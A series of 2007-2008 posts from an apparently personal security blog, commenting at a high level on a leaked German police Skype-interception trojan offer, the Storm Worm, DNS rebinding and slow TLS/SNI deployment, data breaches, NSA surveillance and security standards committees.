    James Hardine writes "Wikileaks has released documents from the German police revealing Skype interception technology. The leaks are currently creating a storm in the German press. The first document is a communication by the Ministry of Justice to the prosecutors office, about the cost splitting for Skype interception. The second document presents the offer made by Digitask, the German company secretly developing Skype interception, and holds information on pricing and license model, high-level technology descriptions and other detail. The document is of global importance because Skype is used by tens or hundreds of millions of people daily to communicate voice calls and Skype (owned by Ebay, Inc) promotes these calls as being encrypted and secure. The technology includes interception boxes, key forwarding trojans and anonymous proxies to hide police communications."

    Is Skype broken? Let's dig deeper:

    [The document] continues to introduce the so-called Skype Capture Unit. In a nutshell: a malware installed on purpose on a target machine, intercepting Skype Voice and Chat. Another feature introduced is a recording proxy, that is not part of the offer, yet would allow for anonymous proxying of recorded information to a target recording station. Access to the recording station is possible via a multimedia streaming client, supposedly offering real-time interception.

    Nope. It's the same old bug: pervert your PC and the enemy has the same power as you. Always remember: the threat is on the node, the wire is safe.

    In this case, Mallory is in the room with you, and Skype can't do a darn thing about it, given that it borrows the display, keyboard, mike and speaker from the operating system. The forthrightness of the proposal and the parties to the negotiations would be compelling evidence that (a) the police want to infect your PC, and (b) infecting your PC is their preferred mechanism. So we can conclude that Skype itself is not efficiently broken as yet, while Microsoft Windows is or more accurately remains broken (the trojan/malware is made for the market-leading Microsoft Windows XP and 2000 only, not the market-following Linux/MacOSX/BSD/Unix family, nor the market-challenging Vista).

    No change, then. For Skype, the dream run has not ended, but it has crossed into that area where it has to deal with actual targetted hacks and attacks. Again, no news, and either way, it remains the best option for us, the ordinary people. Unlike other security systems:

    Another part of the offer is an interception method for SSL based communication, working on the same principle of establishing a man-in-the-middle attack on the key material on the client machine. According to the offer this method is working for Internet Explorer and Firefox webbrowsers. Digitask also recommends using over-seas proxy servers to cover the tracks of all activities going on.

    MITB! Now, normally we make a distinction between demos, security gossip, rumours and other false signals ... but the offer of actual technology by a supplier, with a hard price, to a governmental intercept agency indicates an advanced state of affairs:

    The licensing model presented here relates to instances of installations per month for a minimum of three months. Each installation of the Skype Capture Unit will cost EUR 3500, SSL interception is priced at EUR 2500. A one-time installation fee of EUR 2500 is not further explained. The minimum cost for any installation on a suspect computer for a comprehensive interception of both SSL and Skype will be EUR 20500, if no more than one one-time installation fee are required.

    This is the first hard evidence of professional browser-interference of SSL website access. Rumours of this practice have been around since 2004 or so, from commercial attacks, but nobody dared comment (apparently NDAs are stronger than crimes in the US of A).

    What reliable conclusion can we draw?

    • the cost of an intercept is 2500 and climbing.
    • the "delivery time" taken is a month or so, perhaps indicating the need to probe and inject into Windows.
    • MacOSX and Linux are safe for now, due to small market share and better security focus
    • Vista is safe today, for an unknown brew of market share, newness and "added security" reasons.
    • Skype itself is fine. So install your Skype on a Mac (if human) or a Linux box (if a hardcore techie).

    Less reliably, we can suggest:

    • All major police forces in rich countries will have access to this technology.
    • Major commercial attackers will have access, as well as major criminal attackers.
    • Presumably the desire of the police here is to not interfere with ordinary people's online banking, which they now can do because most banking systems are still stuck on dual factor (memo to my bank: your super-duper advanced dual factor system is truly breached by the MITB).
    • Nor, presumably, do they care about your reading of this blog nor wikileaks, both being available in cleartext as well. Which means the plan to install *TLS/SSL everywhere to protect all browsing* is still a good plan, and is only held up by the slowness at Apache and Microsoft. (Guys, one million phishing victims every year beg you to hurry up.)
    • Police are more interested in breaching the online chat of various bad guys. So, SSL email and chat forums, Skype chat and voice.

    Of course the governance issue remains. The curse of governance says that power will be used for bad. When the good guys can do it, then presumably the bad guys can do it as well, and who's to say the good guys are always good? People who have lots of money should worry, because the propensity for well-budgetted but poorly paid security police in 1st world countries to manipulate their pensions upwards is unfortunately very real. Get a Mac, guys, you can afford it.

    In reality, it simply doesn't matter who is doing it: the picture is so murky that the threat level remains the same to you, the user: you now need to protect your PC against injection of trojans for the purpose of attacking your private information directly.

    Final questions: how many intercepts are they doing and planning, and did the German government set up a cost-sharing for payoffs to the anti-virus companies?

    Posted by iang at 05:46 PM | Comments (2) | TrackBack

    January 11, 2008

    #4.2 Simplicity is Inversely Proportional to the Number of Designers

    Still reeling at the shock of that question, it feels like time to introduce another hypothesis:

    #4.2 Simplicity is Inversely Proportional to the Number of Designers
    Never doubt that a small group of thoughtful, committed citizens can change the world. Indeed, it is the only thing that ever has. Margaret Mead

    Simplicity is proportional to the inverse of the number of designers. Or is it that complexity is proportional to the square of the number of designers?

    Sad but true, if you look at the classical best of breed protocols like SSH and PGP, they delivered their best work when one person designed them. Even SSL was mostly secure to begin with, and it was only the introduction of PKI with its committees, models, digital signature laws and accountants that sent it into orbit around Pluto.

    Sometimes a protocol can survive a team of two, but we are taking huge risks (remember the biggest failure mode of all is failing to deliver anything). Either compromise with your co-designer quickly or kill him, your users will thank you for either. They do not benefit if you are locked in a deadly embrace over the pernickety benefits of MAC-then-encrypt over encrypt-then-MAC.

    It should be clear by now that committees are totally out of the question. They are like whirlpools, great spiralling sinks of talent, so paddle as fast as possible in the other direction. On the other hand, if you are having trouble shrinking your team or agreeing with them, a committee over yonder can be useful as a face saving idea. Point them in that direction of the whirlpool, give them a nudge, and then get back to work.

    Posted by iang at 02:35 PM | Comments (3) | TrackBack

    What good are standards?

    Over at mozo, Jonath asks the most surprising question:


    My second question is this: as members of the Mozilla community, is this an effort that you want me (or people like me) participating in, and helping drive to final publication?

    Absolutely not, on several grounds. Here's some reasons, off the top of my head.

    Committees can't make security, full stop. Committees can write standards shaped like millstones around the neck, though.

    Standards are *not* indicated (in medical sense) for UI because the user is *not* a computer and does not and cannot follow precise rules like protocols.

    UI and security, together, probably requires skills that are not available, easily, to your committee. Branding doesn't sit well with coding, architecture can't talk to lawyers. Nobody knows what a right is, and the number of people who can bring crypto to applications is so small that you won't find them in your committee.

    Security UI itself is an open research area, not an understood discipline that needs further explanation. Standards are indicated if you want to kill research, and move to promulgation of agreed dogma. This is sometimes useful, but only when the problems are solved; which is not indicated with phishing, now, is it?

    Although I have my difficulties with some of the research done, if you take away the ability to research from the community ("that's not standard!"), you've got nothing to tell you what to do, and the enemy has locked you down to a static position. (Static defence stopped around the time of the invention of the canon, so we are looking at quite some history here...)

    Anybody got any other reasons? Is there a positive reason here, anywhere?

    Posted by iang at 02:22 PM | Comments (0) | TrackBack

    January 08, 2008

    UK data breach counts another coup!

    The UK data breach a month or two back counted another victim: one Jeremy Clarkson. The celebrated British "motormouth" thought that nobody should really worry about the loss of the disks, because all the data is widely available anyway. To stress this to the island of nervous nellies, he posted his bank details in the newspaper.

    Back in November, the Government lost two computer discs containing half the population's bank details. Everyone worked themselves into a right old lather about the mistake but I argued we should all calm down because the details in question are to be found on every cheque we hand out every day to every Tom, Dick and cash and carry.

    Unfortunately, some erstwhile scammer decided to take him to task at it and signed him up for a contribution to a good charity. (Well, I suppose it's good, all charities and non-profits are good, right?) Now he writes:

    I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account. I was wrong and I have been punished for my mistake.

    Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.

    What can we conclude from this data point of one victim? Lots, as it happens.

    1. Being a victim of the *indirect* nature continues to support the thesis that security is a market for silver bullets. That is, the market is about FUD, not security in any objective sense.
    2. (writing for the non-Brit audience here,) Jeremy Clarkson is a comedian. Comments from comedians will do more to set the agenda on security than any 10 incumbents (I hesitate to use more conventional terms). There has to be some pithy business phrase about this, like, when your market is defined by comedians, it's time for the, um, incumbents to change jobs.
    3. Of course, he's right on both counts. Yes, there is nothing much to worry about, individually, because (a) the disks are lost, not stolen, and (b) the data is probably shared so willingly that anyone who wants it already has it. (The political question of whether you could trust the UK government to tie its security shoelaces is an entirely other matter...)

      And, yes, he was wrong to stick his neck out and say the truth.


    4. So why didn't the bank simply reverse the transaction? I'll leave that briefly as an exercise to the reader, there being two good reasons that I can think of, after the click.



    a. because he gave implied permission for the transactions by posting his details, and he breached implied terms of service!

    b. because he asked them not to reverse the transaction, as now he gets an opportunity to write another column. Cheap press.

    Hat-tip to JP! And, I've just noticed DigitalMoney's contribution for another take!

    Posted by iang at 04:13 AM | Comments (2) | TrackBack

    October 31, 2007

    Entire UK security industry is sent to Pogo's Swamp

    One of the enduring threads that has been prevalent on this blog but not other places is that the problem starts with ourselves. Without considering our own mistakes, our own frauds, indeed, our own history, it is impossible to understand the way security, FC, and the Internet are going.

    Compelling evidence presented over at LightBlueTouchpaper. Not that their Wordpress blog was hacked (there but for the grace of God, etc etc) but where Richard Clayton asks why did the Government reject all the recommendations of the House of Lords report of a while back? Echoed over at Ianb's blog, probably throughout the entire British IT and security industry. Why?

    Richard searches for an answer: Stupidity? Vested Interests? (On the way, he presents more evidence about how secrecy of big companies is part of the problem, not part of the solution, but that's a distraction.)

    We have good news: The lack of reflective thought is slowly diminishing. Over the last month I've seen an upsurge of comments: 1Raindrop's Gunnar Peterson says "One of the sacred cows that need to gored is the notion that we in the People's Republic of IT Security have it all figured. We don't." Elsewhere Gunnar says "in many cases, they are spending $10 to protect something worth $5, and in other cases they are spending a nickel to protect something worth $1,000."

    Microsoft knows but isn't saying: Vista fails to clear up the security mess. Which means that they spent the last 5 years and got ... precisely nowhere. Forget the claim that Vista bombed in the security department ("short M$ ! buy Apple!") and consider the big picture: if Microsoft can throw their entire company at the issue of security, and fail, what hope the rest?

    Chandler (again) points to the Inquirer:

    Whose interests are really threatened by cybercrime? Well, certainly not the software makers, the chip makers, the hard disk makers, the mouse makers, and least of all the virus busters and security firms which daily release news of the latest “vulnerabilities” plaguing the web.

    No, the victims are the poor users. Not that they’re likely to have their identity stolen or their bank account plundered or their data erased by some malicious bot or other. The chances of that happening are millions to one.

    No, what they are forced to do is continually fork out for spam-busting protection, for “secure” operating systems, for funky firewalls, malware detectors or phish-sniffing software. All this junk clogs up their spanking new PC so that they continually have to upgrade to newer chippery clever enough to have a processing core dedicated to each of the bloatsome security routines keeping them safe while they surf.

    It’s a con, gentlemen. A big fat con.

    No one has a business interest in catching identity thieves or malware writers. There’s no money in it, so no-one’s bothered.

    Chandler then goes on to identify where the solution isn't but let's not get distracted on that, today. Some people including John Q pointed to Linus who said:

    ... But the *discussion* on security seems to never get down to real numbers. So the difference between them is simple: [scheduling] is "hard science". The other one is "people wanking around with their opinions".

    Which rudeness strangely echoes the comment in 2004 or so by a leading security expert who stopped selling for a microsecond and was briefly honest about the profession.

    When I drill down on the many pontifications made by computer security and cryptography experts all I find is given wisdom. Maybe the reason that folks roll their own is because as far as they can see that's what everyone does. Roll your own then whip out your dick and start swinging around just like the experts.

    I only mention it because that dates my thinking on this issue. As I say, I've seen an upsurge in this over the last few months so I can predict that around now is the time that the IT security sector realises that not only do they not have a solution to security, they don't know how to create a solution for security, and even if they accidentally found one, nobody would listen to them anyway.

    If you have followed this far, then you can now see why the UK Government can happily ignore the Lords' recommendations: because they came from the security industry, and that's one industry that has empirically proven that their views are not worth listening to. Welcome to Pogo's swamp.

    Posted by iang at 07:39 AM | Comments (0) | TrackBack

    October 05, 2007

    Storm Worm signals major new shift: a Sophisticated Enemy

    I didn't spot it when Peter Gutmann called it the world's biggest supercomputer (I thought he was talking about a game or something ...). Now John Robb pointed to Bruce Schneier who has just published a summary. Here's my paraphrasing:

    • Patience ...
    • Separation of Roles ...
    • Redundant Roles ...
    • No damage to host ...
    • p2p communications to control nodes ...
    • morphing of standard signatures (DNS, code) ...
    • probing (in military recon terms) past standard defences ...
    • knowledge of the victim's weaknesses ...
    • suppression of the enemy's recon ...

    Bruce Schneier reports that the anti-virus companies are pretty much powerless, and runs through a series of possible defences. I can think of a few too, and I'm sure you can as well. No doubt the world's security experts (cough) will spend a lot of time on this question.

    But, step back. Look at the big picture. We've seen all these things before. Those serious architects in our world (you know who you are) have even built these systems before.

    But: we've never seen the combination of these tactics in an attack .

    This speaks to a new level of sophistication in the enemy. In the past, all the elements were basic. Better than script kiddie, but in that area. What we had was industrialisation of the phishing industry, a few years back, which spoke to an increasing level of capital and management involved.

    Now we have some serious architects involved. This is in line with the great successes of computer science: Unix, the Internet, Skype all achieved this level of sophistication in engineering, with real results. I tried with Ricardo, Lynn&Anne tried with x9.59. Others as well, like James and the Digicash crew. Mojo, Bittorrent and the p2p crowd tried it too.

    So we have a new result: the enemy now has architects as good as our best.

    As a side-issue, well predicted, we can also see the efforts of the less-well architected groups shown for what they are. Takedown is the best strategy that the security-shy banks have against phishing, and that's pretty much a dead duck against the above enemy. (Banks with security goals have moved to SMS authentication of transactions, sometimes known as two channel, and that will still work.)

    But that's a mere throwaway for the users. Back to the atomic discussion of architecture. This is an awesome result. In warfare, one of the dictums is, "know yourself and win half your battles. Know your enemy and win 99 of 100 battles."

    For the first time in Internet history, we now have a situation where the enemy knows us, and is equal to our best. Plus, he's got the capital and infrastructure to build the best tools against us.

    Where are we? If the takedown philosophy is any good data point, we might know ourselves but we know little about the enemy. But, even if we know ourselves, we don't know our weaknesses, and our strengths are useless.

    What's to be done? Bruce Schneier said:

    Redesigning the Microsoft Windows operating system would work, but that's ridiculous to even suggest.

    As I suggested in last year's roundup, we were approaching this decision. Start re-writing, Microsoft. For sake of fairness, I'd expect that Linux and Apple will have a smaller version of the same problem, as the 1970s design of Unix is also a bit out-dated for this job.

    Posted by iang at 07:07 AM | Comments (3) | TrackBack

    August 28, 2007

    On the downside of the MBA-equiped CSO...

    There is always the downside to any silver bullet. Last month I proposed that the MBA is the silver bullet that the security industry needs, and this caused a little storm of protest.

    Here's the defence and counter-attack. This blog has repeatedly railed against the mostly-worthless courses and certifications that are sold to those "who must have a piece of paper." The MBA also gets that big black mark, as it is, at the end of the day, a piece of paper. Saso said in comments:

    In short, I agree, CISO should have an MBA. For its networking value, not anything else.

    Cynical, but there is an element of wisdom there. MBAs are frequently sold on the benefits of networking. In contrast to Saso, I suggest that the benefits of networking are highly over-rated, especially if you take the cost of the MBA and put it alongside the lost opportunity of other networking opportunities. But people indeed flock to pay the entrance price to that club, and if so, maybe it is fair to take their money, as better an b-school than SANS? Nothing we can do about the mob.

    Jens suggests that the other more topical courses simply be modified:

    From what I see out there when looking at the arising generation of CSO's the typical education is a university study to get a Master of Science in the field of applied IT security. Doesn't sound too bad until we look into the topics: that's about 80% cryptography, 10% OS security, 5% legal issues and 5% rest.

    Well, that's stuffed up, then. In my experience, I have found I can teach anyone outside the core crypto area everything they need to know about cryptography in around 20 minutes (secret keys, public keys, hashes, what else is there?), so why are budding CSOs losing 80% on crypto? Jens suggests reducing it by 10%, I would question why it should ever rise above 5%?

    Does the MBA suffer from similar internal imbalance? I say not, for one reason: it is subject to open competition. There is always lots of debate that one side is more balanced than others, and there is a lot of open experimentation in this, as all the schools look at each other's developments in curricula. There are all sorts of variations tuned to different ideas.

    One criticism that was particularly noticeable in mine was that they only spent around 2 days in negotiation, and spent more than that on relatively worthless IT cases. That may be just me, but it is worth noting that b-schools will continue to improve (whereas there is no noticeable improvement from the security side). Adam Shostack spots Chris Hoff who spots HBR on a (non-real) breach case:

    I read the Harvard Business Review frequently and find that the quality of writing and insight it provides is excellent. This month's (September 2007) edition is no exception as it features a timely data breach case study written by Eric McNulty titled "Boss, I think Someone Stole Out Customer Data."

    The format of the HBR case studies are well framed because they ultimately ask you, the reader, to conclude what you would do in the situation and provide many -- often diametrically opposed -- opinions from industry experts.
    ...
    What I liked about the article are the classic quote gems that highlight the absolute temporal absurdity of PCI compliance and the false sense of security it provides to the management of companies -- especially in response to a breach.

    What then is Harvard suggesting that is so radical? The case does no more than document a story about a breach and show how management wakes up to the internal failure. Here's a tiny snippet from Chris's larger selection:

    Sergei reported finding a hole—a disabled firewall that was supposed to be part of the wireless inventory-control system, which used real-time data from each transaction to trigger replenishment from the distribution center and automate reorders from suppliers.

    “How did the firewall get down in the first place?” Laurie snapped.

    “Impossible to say,” said Sergei resolutely. “It could have been deliberate or accidental. The system is relatively new, so we’ve had things turned off and on at various times as we’ve worked out the bugs. It was crashing a lot for a while. Firewalls can often be problematic.”

    Chris Hoff suggests that the managers go through classic disaster-psychological trauma patterns, but instead I see it as more evidence that the CISO needs an MBA, because the technical and security departments spun out of corporate orbit so long ago nobody can navigate them. Chris, think of it this way: the MBAs are coming to you, and the next generation of them will be able to avoid the grief phase, because of the work done in b-school.

    Lynn suggests that it isn't just security, it isn't just CSOs, and is more of a blight than a scratch:

    note that there have been a efforts that aren't particularly CSO-related ... just techies ... in relatively the same time frame as the disastrous card reader deployments ... there were also some magnificent other disastrous security attempts in portions of the financial market segment.

    My thesis is that the CSO needs to communicate upwards, downwards, sideways, and around corners. Not only external but internal, so domination of both sides is needed. As Lynn suggests, it is granted that if you have a bunch of people without leadership, they'll suggest that smart cards are the secure answer to everything from Disney to Terrorism. And they'll be believed.

    The question posed by Lynn is a simple one: why do the techies not see it?

    The answer I saw in banking and smart card monies, to continue in Lynn's context, was two-fold. Firstly, nobody there was counting the costs. Everyone in the smart card industry was focussed on how cheap the smart card was, but not the full costs. Everybody believed the salesmen. Nobody in the banks thought to ask what the costs of the readers were (around 10-100 times that of the card itself...) or the other infrastructure needed, but banks aren't noted for their wisdom, which brings us to the second point.

    Secondly, it was pretty clear that although the bank knew a little bit about transactions, they knew next to nothing about what happened outside their branch doors. Getting into smart card money meant they were now into retail as opposed to transactions. In business terms, think of this as similar to a supermarket becoming a bank. Or v.v. That's too high a price to pay for the supposed security that is entailed in the smart card. Although Walmart will look at this question differently, banks apparently don't have that ability.

    It is impossible to predict whether your average MBA would spot these things, but I will say this: They would be pass/fails in my course, and there would not be anything else on the planet that the boss could do to spot them. Which you can't say for the combined other certifications, which would apparently certify your CSO to spot the difference between 128 bit and 1024 bit encryption ... but sod all of importance.

    Posted by iang at 09:16 AM | Comments (1) | TrackBack

    Threatwatch: US-SSNs melt for $50 in MacArthur Park

    So, having read the HBR case I just wrote about ("nobody else reads the original material they quote, why should I?"), I discovered this numbers gem on the very last page:

    Perhaps the most worrying indicator is that the criminal industry for information is growing. I can go to MacArthur Park in Los Angeles any day of the week and get $50 in exchange for a name, social security number, and date of birth. If I bring a longer list of names and details, I walk away a wealthy man.

    $50 for ID sets seems very high in these days of phishing, but that may be the price for hand-to-hand delivery and a guarantee of quality. Either way, a data point.

    What also strikes is the mention of a physical marketplace. Definitely a novelty! The only thing I know about that place is that it melts in the dark, but it could be that MacArthur Park is simply too large to shut down.

    Posted by iang at 06:20 AM | Comments (0) | TrackBack

    August 27, 2007

    Learning from Iraq and Failure

    Financial Cryptographers are interested in war because it is one of the few sectors where we face an aggressive attacker (as opposed to a statistical failure model). For this reason, current affairs like Iraq and Afghanistan are interesting, aside from their political aspects (September is crunch time!).

    John Robb points to an interview with Lt. Col. John Nagl on how the New Turks in Iraq (more formally known as General Petraeus and his team) have written a new manual for the theater, known as the Counterinsurgency Field Manual.

    We last had a counter guerrilla manual in 1987 but as an army we really avoided counterinsurgency in the wake of Vietnam because we didn't want to fight that kind of war again. Unfortunately the enemy has a vote. And our very conventional superiority in war-fighting is driving our enemy to fight us as insurgents and as guerrillas rather than the kind of war we are most prepared to fight, which is conventional tank-on-tank type of fighting.

    ...

    You still have to be able to do the fighting. A friend of mine when he found out i was writing [the book] wrote to me from Iraq and said

    "remember, Nagl, counterinsurgency is not just the thinking man's war ... It's the graduate level of war."

    Because you still have to be able to do the war fighting stuff. When I was in [Iraq] I called in artillery strikes and air strikes, did the fighting stuff. But I also spent a lot of time meeting with local political leaders, establishing local government, working on economic development.

    You really have to span the whole spectrum of human behavior. We had cultural anthropologists helping on the book, economists, information operation specialists. It's a very difficult type of war, it's a thinking person's kind of war. And it's a kind of war we are learning and adapting and getting better at fighting during the course of the wars in Iraq and Afghanistan.

    I copied those parts in from the interview because they stressed what we see in FC, but check out the interview as it is refreshing. Here's the parallels:

    • The Gung-ho warriors enter the field.
    • And are defeated.
    • Institutions are not able to respond to the new threats until they have shown themselves incapable of forcing old threat models on the enemy.
    • The battle is won, or at least fought, with brains, not brawn.
    • Still, the "warfighting" or general security stuff never goes away.
    • When we are dealing with an asymmetric or "new" attack, multiple disciplines enter into the discussion to analyse the balance between fighting and other strategies.
    • The new strategy emerges, but only after the losses to both our ground forces and our old generals.

    The parallels with today's Internet situation seem pretty clear. How long do we go on fighting the attackers before the New Turks come in and address the battle from a holistic, systemic viewpoint?

    Posted by iang at 07:11 PM | Comments (0) | TrackBack

    August 23, 2007

    Threatwatch: Numbers on phishing, who's to blame, the unbearable loneliness of 4%

    Jonath over at Mozilla takes up the flame and publishes lots of stats on the current state of SSL, phishing and other defences. Headline issues:

    • Number of SSL sites: 600,000 from Netcraft
    • Cost of phishing to US: $2.1 billion dollars.
    • Number of expired certs: 18%
    • Number of users who blame a glitch in the browser for popups: 4%

    I hope he keeps it up, as it will save this blog from having done it for many years :) The connection between SSL and phishing can't be overstressed, and it's welcome to see Mozilla take up that case. (Did I forget to mention TLS/SNI in Apache and Microsoft? Shame on me....)

    Jonath concludes with this odd remark:

    If I may be permitted one iota of conclusion-drawing from this otherwise narrative-free post, I would submit this: our users, though they may be confused, have an almost shocking confidence in their browsers. We owe it to them to maintain and improve upon that, but we should take some solace from the fact that the sites which play fast and loose with security, not the browsers that act as messengers of that fact, really are the ones that catch the blame.

    You, like me, may have read that too quickly, and thought that he suggests that the web sites are to blame, with their expired certs, fast and loose security, etc.

    But, he didn't say that, he simply said those are the ones that *are* blamed. And that's true, there are lots and lots of warnings out there like campaigns to drop SSL v2 and stop sites doing phishing training and other things ... The sites certainly catch the blame, that's definately true.

    But, who really *deserves* the blame? According to the last table in Jonath's post, the users don't really blame the site as much as might be expected: 24%. More are unsure and thus wise, I say: 32%. And yet more imagine an actual attack taking place: 40%.

    That leaves 4% who suspect a "glitch" in the browser itself. Surely one lonely little group there, I wonder if they misunderstood what a "glitch" is... What is a "glitch," anyway, and how did it get into their browsers?

    Posted by iang at 09:06 AM | Comments (0) | TrackBack

    August 16, 2007

    DNS Rebinding, and the drumroll of SHAME for MICROSOFT and APACHE

    Tonight, we have bad news and worse news. The bad news is that the node is yet again the scene of imminent collapse of the Internet as we know it. The worse news is that the fix that could have fixed it ... is still not deployed. The no-news is that we warned about years ago. It's still not done.

    Dan Kaminsky, a hacker of some infamy and humour, gave a son-of-black-hat talk on DNS Rebinding. What this means is that when you go to a site that has a malicious applet or Flash or something, then your node becomes controlled (that's your PC, desktop, laptop, etc) for attacks on other nodes.

    Now, I don't fully understand the deal ... and details were difficult to follow ... but it is something to do with weird things with DNS that allow a malicious site to download bad code into your applet/flash/javascript weakened browser. Then, that code literally takes over and turns your node -- your PC -- into an internal attack-dog under someone else's whistle. Dan uses the example of the printer down the hall, but in finance circles this is the internal derivatives accounting system down the hall, already smoking from too much recent attention.

    Yes, Firefox and IE are both victims.

    The DNS details were scary and voluminous but rest on a basically sound claim: DNS isn't secure, and that we know. It is possible to hand the requestor all sorts of interesting information, and that interesting information can then be used to trick through firewalls, IDS, etc, and compromise the machine, because it is "authoritive" and it comes from the right machine, your machine, your soon-to-be-owned machine.

    Curiously, the object of Dan's project is much more grandiose than that. He's looking to do a bunch of weird measurements on TCP, using this DNS rebinding to bootstrap in and take over the TCP connection. Yeah, MITM, if you spotted the clue.

    (I'll repeat that, Dan claims to be doing MITMs on TCP!)

    To summarise the raw claims (again, given my limited understanding):

    • attack bypasses all firewalls,
    • can be used to own your router,
    • bypasses IDS
    • your browser needs to strike a malicious Flash, Java applets or javascript in some variants (needs sockets, Firefox delivers sockets through javascript??)
    • Works on the 2 major browsers
    • A simplified version has been seen in the wild, by bad guys
    • No DNS fix, but there are some short term patches?

    Fixes: No easy fixes, just temporary patches. DNS is operating as normal, it never was secure anyway, and the modes and tricks used are essential for a whole lot of stuff. Likewise, Flash, etc, which seem to have no more security than windows did in 2002, isn't going to be fixed fully, any time soon. (Dan mentioned he is waiting on Adobe to fix something before full disclosure, but that runs out as someone else is about to publish the same results.)

    • The systemic fix: There is only one mode, and it's secure. Ok, I just had to add that in...
    • The practical fix: Go TLS, everywhere.
    • Timeframe: 3 years.
    • Excuse: read on...

    Here's the old worse news: Dan stated, as near as I can recall it:

    "TLS solves the problem completely, but TLS does not scale to the net, because it does not indicate the host name. This puts more of an indictment on the standards process and on TLS than anything else, we've had TLS for years now, and we still can't share virtual hosts on TLS."

    Yes, it's our old friend TLS/SNI (ServerNameIndication), a leprechaun-like extension that converts TLS from a marginal marketing differentiator at ISPs into a generally deployable solution.

    SNI is available in Firefox, 2.0 and later. Thanks to Mozilla, they did actually started a project on this called SSL v2 MUST DIE because of its ability to help in phishing (same logic, same fix, same sad sorry story). It is fixed in IE7, but only in Vista, so that's short thanks to Microsoft. Opera's got it, and they might have been the first.

    Yet...

    TLS/SNI is not available in Apache's httpd nor in Microsoft's IIS.

    Indeed, I tried last year to contact the httpd team and plead for it. Nothing, it's as if they don't exist. Mozilla were even prepared to pay these guys to fly & fix, but we couldn't find anyone to talk to. Worse, they have had the code for yonks. The code builds, at least the gnutls version. The code works:

    I got proof that Microsoft's team exists, and that they also have no plans to secure the Internet this year.

    Shame, the very shame! Apache's httpd team and Microsoft's IIS team are now going to watch 3 years of pain and suffering, for the want of little fix that is so old that nobody can recall when it was added to the standard.

    (OK, that's the last I heard. There might be updates in the shame. You understand that it isn't my day job to get you to save the net. It is however your day job, Microsoft team, and night job, Apache team, and you can point out current progress in the comments or on your blog or in the very code, itself. Please, we beg you. Save our net.)

    Addendum: a rebinding patch! and some more from the department of snails.

    Posted by iang at 06:59 PM | Comments (5) | TrackBack

    August 10, 2007

    Susan Landau on threats to the USA: don't forget Pogo

    The Washington Post, in the person of Susan Landau, lays out in more clear terms where USA cyber-defence is heading

    The immediate problem is fiber optics. Until recently, telecommunication signals came through the air. The NSA used satellites and antennas to pick up conversations of foreigners talking to other foreigners. Modern communications, however, use fiber; since conversations don't go through the air, the NSA wants to access communications at land-based switches.

    Because communications from around the world often go through the United States, the government can still get access to much of the information it seeks. But wiretapping within the United States has required a FISA search warrant, and the NSA apparently found using FISA too time-consuming, even though emergency access was permitted as long as a warrant was applied for and granted within 72 hours of surveillance.

    Avoiding warrants for these cases sounds simple, though potentially invasive of Americans' civil liberties. Most calls outside the country involve foreigners talking to foreigners. Most communications within the country are constitutionally protected -- U.S. "persons" talking to U.S. "persons." To avoid wiretapping every communication, NSA will need to build massive automatic surveillance capabilities into telephone switches. Here things get tricky: Once such infrastructure is in place, others could use it to intercept communications.

    Grant the NSA what it wants, and within 10 years the United States will be vulnerable to attacks from hackers across the globe, as well as the militaries of China, Russia and other nations.

    Landau choses the evil foreign hacker as her bogeyman. This is is understandable if we recall who her audience is. The threat however is closer to home; to paraphrase Pogo, Americans have not yet met their enemy, but he is you.

    A basic assumption of security was that the NSA was historically no threat to any person, only to nations. Intel info was closely guarded, and breaches of this info was a national security breach, we the people were far better protected by the battle against foreign spies than anything else. No chinese wall, then, more a great wall-of-china around secret tracts of Maryland.

    Now that wall-of-china has been torn down and replaced by trade-grade chinese walls. Breaching chinese walls simply requires the right contact, the right excuse, the right story. Since 9/11, intel info and trade info are all one and the same, and it is now reasonable, expected even, that hundreds of thousands of new readers of data can trawl through criminal databases, intel summaries, background reports and the like.

    For illumination, see the SWIFT battle. The problem wasn't that the NSA was reading the SWIFT traffic, it had been doing that for decades. The problem was the burgeoning spread of the data, as highlighted by events: the Department of Justice now felt it reasonable, indeed required, to get in on the act. Pundits will argue that it was a governed programme, but its secret governance was a setup for more breaches.

    It wasn't the first, nor the second, and it wasn't going to be the last. If we had to choose between the evil chinese hacker and the enemy-who-is-us, I for one would take the evil chinese hacker every time. We can deal with the external enemy, we know how. But the internal enemy, the enemy who is us, he is the destruction of civil society, and there is no army to fight that threat.

    Posted by iang at 10:56 AM | Comments (1) | TrackBack

    August 09, 2007

    Mozilla gets proactive about browser security?

    This article reports that Mozilla are now proactive on security. This is good news. In the past, their efforts could be described as limited to bug patching and the like. Reactive security, in other words, which is what their fuzzer is:

    Mozilla has been using an open-source application security testing tool, known as a fuzzer, for JavaScript to detect and fix dozens of security bugs in Firefox, Mozilla director of ecosystem development Window Snyder said Thursday at the Black Hat USA 2007 conference in Las Vegas. The JavaScript fuzzer found 280 bugs in Firefox, 27 of which were exploitable.

    Now Mozilla is making that JavaScript fuzzer available to anyone who wants to use it, and it'll be followed later this year by fuzzers for the HTTP and FTP protocols.

    "The FTP and HTTP protocol fuzzers act like fake servers that send bad data to sites," Snyder told InformationWeek.The HTTP fuzzer emulates an HTTP server to test how an HTTP client handles unexpected input. The FTP fuzzer likewise tests how an FTP client handles unexpected data.

    Now however there is at least one person employed directly on thinking about security in a proactive sense:

    Expect Firefox 3 to include new phishing and malware protection, extended validation certificates, improved password management, and a security user interface.

    One could criticise this all as too little, too late, too "interests-driven". But changing cultures to think, really think about security is hard. It doesn't happen overnight, and it at least takes years. Consider that Microsoft has been working since 2003 to make this change, and the evidence is not here that their product is secure, yet, shows how hard it is.

    Posted by iang at 08:05 AM | Comments (0) | TrackBack

    Shock of new Security Advice: "Consider a Mac!"

    From the where did you read it first? department here comes an interesting claim:

    Beyond obvious tips like activating firewalls, shutting computers down when not in use, and exercising caution when downloading software or using public computers, Consumer Reports offered one safety tip that's sure to inflame online passions: Consider a Mac.

    "Although Mac owners face the same problems with spam and phishing as Windows users, they have far less to fear from viruses and spyware," said Consumer Reports.

    Spot the difference between us and them? Consumer Report is not in the computing industry. What this suggests about being helpful about security will haunt computing psychologists for years to come.

    For amusement, count how many security experts will pounce on the ready excuse:

    "Because Macs are less prevalent than Windows-based machines, online criminals get less of a return on their investment when targeting them."

    Of course if that's true, it becomes less so with every Mac bought.

    Can you say "monoculture!?"



    The report itself from Consumer Reports seems to be for subscribers only. For our ThreatWatch series, the article has many juicy numbers:

